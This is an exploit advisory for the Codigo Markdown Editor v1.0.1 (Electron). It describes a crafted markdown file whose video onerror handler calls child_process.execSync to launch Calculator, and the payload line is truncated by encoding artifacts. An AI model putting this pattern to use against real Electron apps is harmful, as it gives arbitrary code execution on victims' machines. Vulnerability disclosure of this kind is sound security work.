Codigo Markdown Editor v1.0.1 (Electron) Exploit, Remote Code Execution

# Exploit Title: Codigo Markdown Editor v1.0.1 (Electron) - Arbitrary Code Execution
# Date: 2023-05-03
# Exploit Author: 8bitsec
# Vendor Homepage:
# Software Link:
# Version: 1.0.1
# Tested on: [Mac OS 13]

Release Date:

Product & Service Introduction:
A Markdown editor & notes app made with Vue & Electron

Technical Details & Description:

A vulnerability was discovered on Codigo markdown editor v1.0.1 allowing a =
user to execute arbitrary code by opening a specially crafted file.

Proof of Concept (PoC):

Arbitrary code execution:

Create a markdown file (.md) in any text editor and write the following pay=
<video><source onerror=3D"alert(require('child_process').execSync('/System/=

Opening the file in Codigo will auto execute the Calculator application.

All rights reserved 2009 - 2024
Powered by: MVCP2 / BVCP / ASPF-MILTER / PHP 8.3 / NGINX / FreeBSD